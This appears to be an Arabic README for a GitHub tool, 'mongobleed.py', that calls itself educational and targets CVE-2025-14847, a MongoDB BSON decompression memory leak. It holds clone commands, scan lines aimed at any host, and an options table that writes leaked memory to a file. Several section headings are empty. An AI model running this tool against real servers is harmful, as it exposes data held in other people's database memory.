
يحتوي هذا المستودع على أداة بحث تعليمية مصممة لتوضيح مفاهيم سلامة الذاكرة الكامنة خلف CVE-2025-14847، وهي ثغرة حرجة اكتُشفت في تطبيق MongoDB لفك ضغط BSON. تحاكي الأداة كيف يمكن لفحص الحدود غير السليم أثناء فك الضغط أن يؤدي إلى تسريب الذاكرة.
توضح هذه الأداة:
المتطلبات الأساسية
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>
# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000
# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000
تسلط هذه الثغرة الضوء على قضايا أوسع في أمان قواعد البيانات:
موارد رسمية:
| الخيار | الافتراضي | الوصف |
|---|
--host | localhost | مضيف MongoDB المستهدف |
--port | 27017 | منفذ MongoDB المستهدف |
--min-offset | 20 | الحد الأدنى لطول المستند للفحص |
--max-offset | 8192 | الحد الأقصى لطول المستند للفحص |
--output | leaked.bin | ملف الإخراج للبيانات المسربة |